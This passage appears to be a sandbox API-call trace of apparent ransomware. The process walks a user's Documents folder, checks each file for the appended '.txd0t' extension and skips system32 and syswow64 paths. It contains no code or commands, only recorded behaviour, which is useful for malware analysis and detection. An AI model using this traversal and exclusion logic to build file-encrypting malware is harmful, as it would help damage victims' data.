(psz1="82f_2PILY3Rkg8CydxKr.xlsx.txd0t", psz2="..") returned 1 [0129.199] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.199] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.199] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="82f_2PILY3Rkg8CydxKr.xlsx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx.txd0t" [0129.199] PathFindExtensionW (pszPath="82f_2PILY3Rkg8CydxKr.xlsx.txd0t") returned=".txd0t" [0129.199] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.199] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x979d05c0, ftCreationTime.dwHighDateTime=0x1d566bd, ftLastAccessTime.dwLowDateTime=0x55372160, ftLastAccessTime.dwHighDateTime=0x1d5a7a0, ftLastWriteTime.dwLowDateTime=0x513a4d8f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x17cd1, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="9H_Sl92NVVWuSvdwZJYh.pptx.txd0t", cAlternateFileName="9H_SL9~1.TXD")) returned 1 [0129.199] StrCmpW (psz1="9H_Sl92NVVWuSvdwZJYh.pptx.txd0t", psz2=".") returned 1 [0129.199] StrCmpW (psz1="9H_Sl92NVVWuSvdwZJYh.pptx.txd0t", psz2="..") returned 1 [0129.199] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.199] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.199] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="9H_Sl92NVVWuSvdwZJYh.pptx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx.txd0t" [0129.199] PathFindExtensionW (pszPath="9H_Sl92NVVWuSvdwZJYh.pptx.txd0t") returned=".txd0t" [0129.199] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.199] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee80daf0, ftCreationTime.dwHighDateTime=0x1d5eda0, ftLastAccessTime.dwLowDateTime=0x640a9100, ftLastAccessTime.dwHighDateTime=0x1d5c2de, ftLastWriteTime.dwLowDateTime=0x513cafee, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1c20, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="aayLh9Av.xlsx.txd0t", cAlternateFileName="AAYLH9~1.TXD")) returned 1 [0129.199] StrCmpW (psz1="aayLh9Av.xlsx.txd0t", psz2=".") returned 1 [0129.199] StrCmpW (psz1="aayLh9Av.xlsx.txd0t", psz2="..") returned 1 [0129.199] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.199] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.199] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="aayLh9Av.xlsx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx.txd0t" [0129.199] PathFindExtensionW (pszPath="aayLh9Av.xlsx.txd0t") returned=".txd0t" [0129.199] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.199] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52c4d210, ftCreationTime.dwHighDateTime=0x1d5e83c, ftLastAccessTime.dwLowDateTime=0xe5260e00, ftLastAccessTime.dwHighDateTime=0x1d5ef56, ftLastWriteTime.dwLowDateTime=0x513cafee, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1865f, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="chS1ef v8z.odp.txd0t", cAlternateFileName="CHS1EF~1.TXD")) returned 1 [0129.199] StrCmpW (psz1="chS1ef v8z.odp.txd0t", psz2=".") returned 1 [0129.199] StrCmpW (psz1="chS1ef v8z.odp.txd0t", psz2="..") returned 1 [0129.199] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.199] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.200] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="chS1ef v8z.odp.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp.txd0t" [0129.200] PathFindExtensionW (pszPath="chS1ef v8z.odp.txd0t") returned=".txd0t" [0129.200] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.200] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x186cbfe0, ftCreationTime.dwHighDateTime=0x1d5cf93, ftLastAccessTime.dwLowDateTime=0x85968cb0, ftLastAccessTime.dwHighDateTime=0x1d5f025, ftLastWriteTime.dwLowDateTime=0x513f144c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x180c9, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="CsjFe8d.pptx.txd0t", cAlternateFileName="CSJFE8~1.TXD")) returned 1 [0129.200] StrCmpW (psz1="CsjFe8d.pptx.txd0t", psz2=".") returned 1 [0129.200] StrCmpW (psz1="CsjFe8d.pptx.txd0t", psz2="..") returned 1 [0129.200] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.200] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.200] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="CsjFe8d.pptx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx.txd0t" [0129.200] PathFindExtensionW (pszPath="CsjFe8d.pptx.txd0t") returned=".txd0t" [0129.200] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.200] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x5ad15bdf, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x55200, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="Database1.accdb.txd0t", cAlternateFileName="DATABA~1.TXD")) returned 1 [0129.200] StrCmpW (psz1="Database1.accdb.txd0t", psz2=".") returned 1 [0129.200] StrCmpW (psz1="Database1.accdb.txd0t", psz2="..") returned 1 [0129.200] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.200] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.200] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="Database1.accdb.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Database1.accdb.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Database1.accdb.txd0t" [0129.200] PathFindExtensionW (pszPath="Database1.accdb.txd0t") returned=".txd0t" [0129.200] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.200] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0129.200] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.200] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.200] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbebfca0, ftCreationTime.dwHighDateTime=0x1d5eb4c, ftLastAccessTime.dwLowDateTime=0x694d61f0, ftLastAccessTime.dwHighDateTime=0x1d5ef0d, ftLastWriteTime.dwLowDateTime=0x5141784d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x225b, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="dMMktGSdsuA8JTH.docx.txd0t", cAlternateFileName="DMMKTG~1.TXD")) returned 1 [0129.200] StrCmpW (psz1="dMMktGSdsuA8JTH.docx.txd0t", psz2=".") returned 1 [0129.200] StrCmpW (psz1="dMMktGSdsuA8JTH.docx.txd0t", psz2="..") returned 1 [0129.200] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.200] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.200] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="dMMktGSdsuA8JTH.docx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx.txd0t" [0129.200] PathFindExtensionW (pszPath="dMMktGSdsuA8JTH.docx.txd0t") returned=".txd0t" [0129.200] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.200] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe473dc0, ftCreationTime.dwHighDateTime=0x1d56dd1, ftLastAccessTime.dwLowDateTime=0xc7450bc0, ftLastAccessTime.dwHighDateTime=0x1d59b69, ftLastWriteTime.dwLowDateTime=0x5141784d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x130b9, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="gaAE08.xlsx.txd0t", cAlternateFileName="GAAE08~1.TXD")) returned 1 [0129.200] StrCmpW (psz1="gaAE08.xlsx.txd0t", psz2=".") returned 1 [0129.200] StrCmpW (psz1="gaAE08.xlsx.txd0t", psz2="..") returned 1 [0129.200] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.200] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.200] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="gaAE08.xlsx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx.txd0t" [0129.201] PathFindExtensionW (pszPath="gaAE08.xlsx.txd0t") returned=".txd0t" [0129.201] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.201] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab1b030, ftCreationTime.dwHighDateTime=0x1d5ec9f, ftLastAccessTime.dwLowDateTime=0x5fc14230, ftLastAccessTime.dwHighDateTime=0x1d57ebc, ftLastWriteTime.dwLowDateTime=0x51464c25, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xb98c, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="lLleeaH.xlsx.txd0t", cAlternateFileName="LLLEEA~1.TXD")) returned 1 [0129.201] StrCmpW (psz1="lLleeaH.xlsx.txd0t", psz2=".") returned 1 [0129.201] StrCmpW (psz1="lLleeaH.xlsx.txd0t", psz2="..") returned 1 [0129.201] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.201] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.201] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="lLleeaH.xlsx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx.txd0t" [0129.201] PathFindExtensionW (pszPath="lLleeaH.xlsx.txd0t") returned=".txd0t" [0129.201] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.201] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8c878c0, ftCreationTime.dwHighDateTime=0x1d58b7c, ftLastAccessTime.dwLowDateTime=0x53d3ce0, ftLastAccessTime.dwHighDateTime=0x1d58e68, ftLastWriteTime.dwLowDateTime=0x51465f56, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18f22, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="lzf-_9_.pptx.txd0t", cAlternateFileName="LZF-_9~1.TXD")) returned 1 [0129.201] StrCmpW (psz1="lzf-_9_.pptx.txd0t", psz2=".") returned 1 [0129.201] StrCmpW (psz1="lzf-_9_.pptx.txd0t", psz2="..") returned 1 [0129.201] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.201] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.201] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="lzf-_9_.pptx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx.txd0t" [0129.201] PathFindExtensionW (pszPath="lzf-_9_.pptx.txd0t") returned=".txd0t" [0129.201] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.201] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x487438f0, ftCreationTime.dwHighDateTime=0x1d5e12a, ftLastAccessTime.dwLowDateTime=0x3a657ae0, ftLastAccessTime.dwHighDateTime=0x1d5e593, ftLastWriteTime.dwLowDateTime=0x51470edd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x708e, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="Md5Q.odt.txd0t", cAlternateFileName="MD5QOD~1.TXD")) returned 1 [0129.201] StrCmpW (psz1="Md5Q.odt.txd0t", psz2=".") returned 1 [0129.201] StrCmpW (psz1="Md5Q.odt.txd0t", psz2="..") returned 1 [0129.201] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.201] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.201] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="Md5Q.odt.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Md5Q.odt.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Md5Q.odt.txd0t" [0129.201] PathFindExtensionW (pszPath="Md5Q.odt.txd0t") returned=".txd0t" [0129.201] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.201] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14e36670, ftCreationTime.dwHighDateTime=0x1d5cdf0, ftLastAccessTime.dwLowDateTime=0xda2c03d0, ftLastAccessTime.dwHighDateTime=0x1d59bf8, ftLastWriteTime.dwLowDateTime=0x51611625, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16bb6, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="mDGOSIz_qds.docx.txd0t", cAlternateFileName="MDGOSI~1.TXD")) returned 1 [0129.201] StrCmpW (psz1="mDGOSIz_qds.docx.txd0t", psz2=".") returned 1 [0129.201] StrCmpW (psz1="mDGOSIz_qds.docx.txd0t", psz2="..") returned 1 [0129.201] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.201] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.201] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="mDGOSIz_qds.docx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx.txd0t" [0129.201] PathFindExtensionW (pszPath="mDGOSIz_qds.docx.txd0t") returned=".txd0t" [0129.201] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.201] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1200a910, ftCreationTime.dwHighDateTime=0x1d587f8, ftLastAccessTime.dwLowDateTime=0xc9923070, ftLastAccessTime.dwHighDateTime=0x1d5e762, ftLastWriteTime.dwLowDateTime=0x5163795f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x63d9, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="MRcnfzewVmw.docx.txd0t", cAlternateFileName="MRCNFZ~1.TXD")) returned 1 [0129.201] StrCmpW (psz1="MRcnfzewVmw.docx.txd0t", psz2=".") returned 1 [0129.201] StrCmpW (psz1="MRcnfzewVmw.docx.txd0t", psz2="..") returned 1 [0129.202] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.202] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.202] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="MRcnfzewVmw.docx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx.txd0t" [0129.202] PathFindExtensionW (pszPath="MRcnfzewVmw.docx.txd0t") returned=".txd0t" [0129.202] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.202] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0129.202] StrCmpW (psz1="My Music", psz2=".") returned 1 [0129.202] StrCmpW (psz1="My Music", psz2="..") returned 1 [0129.202] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0129.202] StrCmpW (psz1="My Pictures", psz2=".") returned 1 [0129.202] StrCmpW (psz1="My Pictures", psz2="..") returned 1 [0129.202] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0129.202] StrCmpW (psz1="My Shapes", psz2=".") returned 1 [0129.202] StrCmpW (psz1="My Shapes", psz2="..") returned 1 [0129.202] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0129.202] StrCmpW (psz1="My Videos", psz2=".") returned 1 [0129.202] StrCmpW (psz1="My Videos", psz2="..") returned 1 [0129.202] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde4069f0, ftCreationTime.dwHighDateTime=0x1d5f0c3, ftLastAccessTime.dwLowDateTime=0x5d35a670, ftLastAccessTime.dwHighDateTime=0x1d5e1f2, ftLastWriteTime.dwLowDateTime=0x5163795f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x256f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NUZN31jJgT6UykF_.ots.txd0t", cAlternateFileName="NUZN31~1.TXD")) returned 1 [0129.202] StrCmpW (psz1="NUZN31jJgT6UykF_.ots.txd0t", psz2=".") returned 1 [0129.202] StrCmpW (psz1="NUZN31jJgT6UykF_.ots.txd0t", psz2="..") returned 1 [0129.202] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.202] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.202] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="NUZN31jJgT6UykF_.ots.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots.txd0t" [0129.202] PathFindExtensionW (pszPath="NUZN31jJgT6UykF_.ots.txd0t") returned=".txd0t" [0129.202] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.202] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x517427ed, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x517427ed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0129.202] StrCmpW (psz1="Outlook Files", psz2=".") returned 1 [0129.202] StrCmpW (psz1="Outlook Files", psz2="..") returned 1 [0129.202] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.202] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.202] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="Outlook Files", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files" [0129.202] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\windows\\system32\\") returned 0x0 [0129.202] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\windows\\syswow64\\") returned 0x0 